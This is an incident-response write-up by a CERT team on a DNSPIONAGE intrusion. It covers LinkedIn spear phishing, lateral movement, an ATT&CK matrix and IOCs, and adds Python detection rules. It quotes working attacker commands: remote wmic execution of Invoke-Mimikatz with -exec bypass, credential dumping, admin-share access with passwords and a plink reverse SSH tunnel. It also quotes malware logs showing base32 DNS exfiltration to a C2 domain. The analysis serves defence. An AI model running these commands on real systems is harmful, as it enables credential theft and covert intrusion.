Recently, we had an incident response involving the malware DNSPIONAGE.

At CERT-OPMD, we thought it would be interesting to share our observations.

Mainly, we observed fairly common actions and tools, as described in the infographic below.


In this blog post, we will not describe and analyse the dropper again, because Talos already did a great job here: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

Instead, we will focus on what they could not have seen with their telemetry, and what we could see during our investigation.

The screenshot above is what we are talking about here.

Talos observed two domains during their analysis:

  • hr-suncor[.]com
  • hr-wipro[.]com

They obtained the "Suncor" dropper.

During our investigation, we were targeted with the Wipro document (see screenshot below):

A Google reverse image search shows where the attackers got the image below (spoiler: from the legitimate wipro.com website, see screenshot below).

So now we know that they intended to carry out some really advanced spear phishing.

During our investigation, we had the chance to speak with very understanding users, who remembered weird things that had happened to them.

One of them remembered speaking with an HR contact from Wipro on LinkedIn for a few days before the attack.

We hid the identity of the LinkedIn account because we assume there is a real person behind it, whose account may have been stolen.


"Fortunately", the infected users were technical IT staff, so it was easy for them to understand when we talked about "phishing", "spear phishing via social media", etc.

We hope this data will help you understand how DNSPIONAGE infects people.



Now, we will describe the lateral movement we observed during the Incident Response.

We observed some very "usual" phases in this case: a preparation phase for the whole attack (domain registration, and so on), a delivery phase (social engineering through a professional social network), and an installation and C&C phase (where the malware is dropped, and the macro used for dropping creates a scheduled task).

Then we observed the adversaries performing directory listing through batch files:

  • dir /s /a C:\ 2>&1    (from C: to Z:)

These results were exfiltrated over HTTP to the C&C for analysis: the actions we observed next were file copying and the exfiltration of specific files, such as a file containing the backup configuration. We assume the listings were used to map the network "passively".

Once they had the hostname information, the adversaries performed discovery using Microsoft tools, including network discovery, software discovery, share discovery, etc.:

  • wmic logicaldisk get name
  • net group "domain admins" /domain
  • ping -n 1 -a IP
  • net use \\HOSTNAME\c$ /user:"DOMAIN\USERNAME" "PASSWORD" 2>&1
  • WMIC /Node:localhost /Namespace:\\root\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
  • wmic /node:"HOSTNAME" process call create "cmd /c powershell -exec bypass import-module c:\users\public\new.ps1;invoke-mimikatz

With all the information gathered, the adversaries could perform targeted lateral movement to critical servers, by installing a PuTTY-like client to open an SSH tunnel and reach RDP remotely.

  • echo y | .\downloads\plink32.exe -P 443 -C -R -l <login> -pw <password>
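As an added example (not code from the original post or from CERT-OPMD), here is a small Python rule set that flags the discovery and lateral-movement command lines listed above when run over process-creation events; the rule names, the event format and the sample events are constructed for this illustration.

```python
import re

# Detection rules written from the command lines quoted in this write-up.
# Rule names are hypothetical; patterns are case-insensitive regexes over
# the full process command line (e.g. from Sysmon or EDR process events).
RULES = [
    ("remote_wmic_powershell_bypass",
     re.compile(r"wmic\s+/node:.*process\s+call\s+create.*powershell.*-exec\s+bypass", re.I)),
    ("mimikatz_invocation",
     re.compile(r"invoke-mimikatz|sekurlsa::logonpasswords", re.I)),
    ("plink_reverse_tunnel",
     re.compile(r"plink\w*\.exe.*\s-R\b", re.I)),
    ("admin_share_with_creds",
     re.compile(r"net\s+use\s+\\\\\S+\\c\$\s+/user:", re.I)),
    ("av_product_discovery",
     re.compile(r"securitycenter.*antivirusproduct", re.I)),
    ("domain_admins_enum",
     re.compile(r"net\s+group\s+\"?domain admins\"?\s+/domain", re.I)),
    ("recursive_drive_listing",
     re.compile(r"^dir\s+/s\s+/a\s+[a-z]:\\", re.I)),
]

def match_rules(cmdline):
    """Names of every rule the command line triggers, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """events: iterable of (host, cmdline). Returns [(host, rule, cmdline), ...]."""
    return [(host, name, cmd) for host, cmd in events for name in match_rules(cmd)]

# Constructed sample process events modelled on the post's commands (not real logs).
SAMPLE_EVENTS = [
    ("WS01", r'wmic /node:"SRV02" process call create "cmd /c powershell -exec bypass import-module c:\users\public\new.ps1;invoke-mimikatz"'),
    ("WS01", r'cmd /c echo y | .\downloads\plink32.exe -P 443 -C -R -l <login> -pw <password>'),
    ("WS01", r'net use \\SRV02\c$ /user:"CORP\jdoe" "Passw0rd" 2>&1'),
    ("WS01", r'WMIC /Node:localhost /Namespace:\\root\SecurityCenter Path AntiVirusProduct Get /Format:List'),
    ("WS01", r'net group "domain admins" /domain'),
    ("WS01", r'dir /s /a C:\ 2>&1'),
    ("WS07", r'ipconfig /all'),
    ("WS07", r'net use Z: \\fileserver\share'),
]

if __name__ == "__main__":
    for host, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}\t{rule}\t{cmd}")
```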

The diagram below helps to understand DNSPIONAGE's process within the network.

  • Mimikatz: a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
  • Off-the-shelf administration software
  • Bitvise WinSSHD: an easy-to-use SSH server which includes secure remote access via console (vt100, xterm and bvterm supported) and secure remote access via GUI (Remote Desktop or WinVNC required).
  • Open source hacking tools: https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1
  • Custom malware: DNSPIONAGE
  • PuTTY (plink): to open an SSH tunnel in order to gain RDP access to internal assets

In order to understand the entire behaviour of the attackers, from initial access to data exfiltration, we created a matrix to reconstruct their complete TTPs.

We based our matrix on MITRE's work; MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. We broke down all the phases of the actions taken by the attackers, so that any analyst or researcher can understand and remediate this situation if they encounter it.

Matrix columns: MITRE ATT&CK phase, technique, IOC or command, and our comments and observations.

Initial Access
  • Spearphishing via Service
    • IOC: https://fr[.]linkedin[.]com/in/XXXXXXXXXX
    • The "HR consultant" spoke with targets for weeks through LinkedIn before delivering the spearphishing link
  • Spearphishing Link

Execution
  • Windows Management Instrumentation
    • wmic /node:"USER" /user:"DOMAIN\USERNAME" /password:PASSWORD process call create "cmd /c echoy y | .\Downloads\plink32.exe -P 443 -C -R -l <login>-pw <password>"
    • Command failed but was used three times
  • Custom batch files
    • Downloads\bat_file_46583.bat
    • Custom batch files were used to script actions (directory listings, copying ps1 tools to many other assets). Example:
      C:\Users\USERNAME\.oracleServices>CHCP 65001
      C:\Users\USERNAME\.oracleServices>copy .\Downloads\new.ps1 \\HOSTNAME\c$\users\public\ 2>&1
       1 file(s) copied.
      C:\Users\USERNAME\.oracleServices>copy .\Downloads\new.ps1 \\HOSTNAME\c$\users\public\ 2>&1
       1 file(s)
  • Command-Line Interface
    • wmic /node:"HOSTNAME" process call create "cmd /c powershell -exec bypass import-module c:\users\public\new.ps1;invoke-mimikatz
    • Using cmd to call PowerShell with "-exec bypass" args, and PowerShell with "-exec bypass" args to launch Mimikatz

Persistence
  • Scheduled Task
    • Set service = CreateObject("schedule.service")
    • regInfo.Description = "chromium updater v 37.5.0"
    • regInfo.Author = "Google Inc."
    • Observed in the dropper's macro

Defense Evasion
  • File Deletion
    • del .\Downloads\bat_file_46583.bat
    • After using a custom .bat downloaded from the C2, the attackers deleted it immediately

Credential Access
  • Credential Dumping
    • sekurlsa::logonpasswords
    • Includes the script from https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1
    • Mimikatz version: mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28)

Discovery
  • System Information Discovery (T1082)
    • echo %username% (i: -4000, t: -1, k: 0)
    • hostname (i: -5000, t: -1, k: 0)
    • systeminfo | findstr /B /C:"Domain" (i: -6000, t: -1, k: 0)
    • Get detailed information about the operating system
  • Permission Groups Discovery
    • net group "domain admins" /domain
  • Query Registry
    • reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client"
    • Get remote connection details from the user
  • File and Directory Discovery
    • dir /s /a C:\ 2>&1
    • dir \\HOSTNAME\c$ 2>&1
    • Batch scripts were used to perform directory discovery locally or remotely
  • Windows Admin Shares
    • net use \\HOSTNAME\c$ /user:"DOMAIN\USERNAME" "PASSWORD" 2>&1
    • Try to remotely access a networked system
  • Remote System Discovery
    • ping -n 1 -a IP
    • Check whether the IP is up
  • Security Software Discovery
    • WMIC /Node:localhost /Namespace:\\root\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
    • Adversaries attempt to get a listing of security software
  • System Network Configuration Discovery
    • ipconfig /all
    • Get details of the network configuration from the host
  • System Information Discovery
    • wmic logicaldisk get name
    • List all logical and physical drives

Lateral Movement
  • Remote Desktop Protocol
    • echo y | .\downloads\plink32.exe -P 443 -C -R -l <login> -pw <password>
    • Using plink32 to open an SSH tunnel to perform remote RDP
  • Remote File Copy
    • copy .\Downloads\new.ps1 \\HOSTNAME\c$\users\public\ 2>&1
    • Using remote copy to push files used for lateral movement, like new.ps1 (Mimikatz)

Collection
  • Data from Local System
    • "ull": "/Client/Upload",
    • "dl": [],
    • "ul": ["d:\mRemoteNG-IMFO\confCons.xml"]

Exfiltration
  • Exfiltration Over Command and Control Channel
    • "ull": "/Client/Upload",
    • [Message] uploading files form
    • In log.txt we can observe the JSON orders, including the "Upload" orders and the upload URL

Command and Control
  • Commonly Used Port
    • Port 80 HTTP for C2
    • Port 443 for SSH tunnel
  • Standard Application Layer Protocol
  • Data Encoding
    • [Message] send command result dns length:63
    • [Message] hSfAGJRFIAJHGGWU6S[…]0.0ffice36o.com
    • [Message] umCGGJRFI[…]0.0ffice36o.com
    • [Message] 6L6yGJRFIA2[…]0.0ffice36o.com
    • Base32 is used to encode DNS messages
  • Multiband Communication
    • [Message] config file found!
    • [Message] current directory set to C:\Users\USERNAME\.oracleServices\
    • [Message] entering normal mode
    • [Message] get command with dns
    • The malware can switch between HTTP mode and DNS mode to exfiltrate data
  • Remote File Copy
    • "dl": ["/Client/Download/LXqaYRoxoPYNOwjfDadLJAExtjgZYBunvJFwoEohVXJvK"],
    • The malware downloaded batch scripts or ps1 scripts to perform actions.
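The Data Encoding and Multiband Communication rows above describe base32-encoded subdomains queried under 0ffice36o[.]com. As an added example, not part of the original post, the following Python flags such queries in a DNS log, both by a watchlist suffix and by a length/alphabet/entropy heuristic that does not depend on knowing the domain; the log format, thresholds and sample queries are assumptions constructed for this illustration.

```python
import math
import re
from collections import defaultdict

# Heuristic: a long leading label made only of base32 alphabet characters with
# high entropy is a tunnelling candidate. Thresholds are assumptions to tune.
BASE32_LABEL = re.compile(r"^[A-Za-z2-7]+$")
MIN_LABEL_LEN = 16
MIN_ENTROPY = 4.0  # base32 of compressed/encrypted data sits near the 5-bit maximum

def shannon_entropy(s):
    """Bits per character, case-folded (base32 decoders ignore case)."""
    s = s.upper()
    counts = [s.count(c) for c in set(s)]
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts)

def looks_base32_encoded(label):
    return (len(label) >= MIN_LABEL_LEN
            and BASE32_LABEL.match(label) is not None
            and shannon_entropy(label) >= MIN_ENTROPY)

def parse_line(line):
    """Constructed log format: '<timestamp> <source ip> <qtype> <qname>'."""
    ts, src, qtype, qname = line.split()
    return {"ts": ts, "src": src, "qtype": qtype, "qname": qname.rstrip(".")}

def flag_tunnel_queries(log_text, watch_suffixes=()):
    """Return (flagged records, approximate decoded bytes sent per source)."""
    flagged, volume = [], defaultdict(int)
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        first_label = rec["qname"].split(".")[0]
        watched = any(rec["qname"].lower().endswith("." + s) for s in watch_suffixes)
        if watched or looks_base32_encoded(first_label):
            rec["reason"] = "watchlist" if watched else "base32-like label"
            flagged.append(rec)
            volume[rec["src"]] += len(first_label) * 5 // 8  # 5 bits per base32 char
    return flagged, dict(volume)

# Constructed sample log (not from the incident): three queries shaped like the
# post's <base32>.0.0ffice36o.com examples, plus benign lookups.
DNS_LOG = """
2019-01-15T09:12:01Z 10.10.4.21 A qW3eR5tY7uI2oP4aS6dF.0.0ffice36o.com
2019-01-15T09:12:02Z 10.10.4.21 A mN7bV6cX5zL4kJ3hG2fA.0.0ffice36o.com
2019-01-15T09:12:03Z 10.10.4.21 A pL2oK3iJ4uH5yG6tF7rD.0.0ffice36o.com
2019-01-15T09:12:05Z 10.10.4.22 A www.example.com
2019-01-15T09:12:06Z 10.10.4.22 A intranetsharepointportal.example.com
2019-01-15T09:12:07Z 10.10.4.23 A mail.example.org
"""
```

The long but dictionary-like label intranetsharepointportal stays below the entropy threshold, which is why the alphabet and length checks alone are not enough.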



During the investigation we were able to trace a number of IP addresses used by the attackers. We found the IP that hosted the C2, the IP used for the RDP connection, and so on:

IPs and their use: addresses used for RDP, and *.0ffice36o[.]com resolving to the HTTP server used for C2.


By performing some passive DNS resolution from hr-wipro[.]com (the dropper delivery domain) and hr-suncor[.]com (observed by Talos), we could observe the following domains/IPs:

Pivot domains: hr-wipro[.]com, hr-suncor[.]com


After compromising the first victim, the main goal of the attackers is to perform lateral movement in order to gain better access to more sensitive data and/or assets:

  • They first tried to use Mimikatz remotely on several servers (which triggered our SOC alert). "Fortunately", it seems they only used sekurlsa::logonpasswords and did not create any golden or silver tickets.
  • Mimikatz was not really effective, but they could already execute arbitrary code remotely.
    • So they decided to copy plink32.exe, a PuTTY-like client, onto several assets. (sha256sum: 3984ae8dd6df1196211232eb56393a4ce3a330508c5862c38ea3b8faf8048072)
    • They executed plink32.exe to create a tunnel in order to perform remote RDP on assets. (echo y | .\downloads\plink32.exe -P 443 -C -R -l <login> -pw <password>)
    • By using RDP, it was easier for them to access database servers and to identify other critical assets.


We were very lucky during the investigation: the attackers made a lot of mistakes that made our investigation easier and gave us very precise indicators of how they performed their requests.

So, we hope this article will help you to investigate internally whether you may have been targeted by DNSPIONAGE.